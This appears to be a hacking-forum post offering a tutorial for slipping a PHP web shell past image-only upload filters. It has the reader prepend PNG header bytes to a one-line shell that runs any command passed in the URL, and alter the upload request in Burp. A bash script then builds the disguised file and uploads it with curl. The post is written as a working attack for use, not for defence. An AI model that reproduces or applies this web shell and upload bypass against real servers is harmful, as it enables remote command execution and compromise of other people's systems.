How to Bypass File Upload Filters with a PHP Shell ✅️

[morix]

Hi, yyou have a place to upload files that you can access, but there is a filter making sure that the
file type matches the ones expected (e.g. only image file types)

PNG Image Header
89 50 4E 47

Open a hex editor and create a new file, copy those bytes over to the beginning of the new file. Into the
TEXT area (on the right, not the bytes area where you just pasted the header above) paste your shell
 

[ Hidden Content! ]

 

Code:

<?php system($_GET['c']);?>

It should look like this



Take note of the length



Next start burp and navigate to the upload directory.

Then do the following

1. Turn on interceptor

2. Send an upload request with any file

3. Modify the request

 

Original

 

Modified

You can automate this request by doing the following

 

[ Hidden Content! ]

 

Code:

#!/bin/bash

# Function to create PNG file with embedded PHP shell
create_embedded_shell_png() {
    echo -n -e "\x89\x50\x4E\x47" > embedded_shell.png
    echo '<?php system($_GET["c"]); ?>' >> embedded_shell.png
}

# Function to calculate file length
get_file_length() {
    file_length=$(stat -c %s embedded_shell.png)
    echo "$file_length"
}

# Function to upload file to server
upload_file() {
    url="http://example.com/upload.php"  # Replace with actual upload URL
    file="embedded_shell.png"
    curl -X POST -F "file=@$file" $url
}

# Main script
echo "Creating PNG file with embedded PHP shell..."
create_embedded_shell_png

echo "File created successfully."

file_length=$(get_file_length)
echo "File length: $file_length bytes"

echo "Uploading file to server..."
upload_file

echo "File uploaded successfully."

 

For more HQ tutorials leave a like ✅

WorkingThis leak has been rated as still working 0 times this week. (1 in total)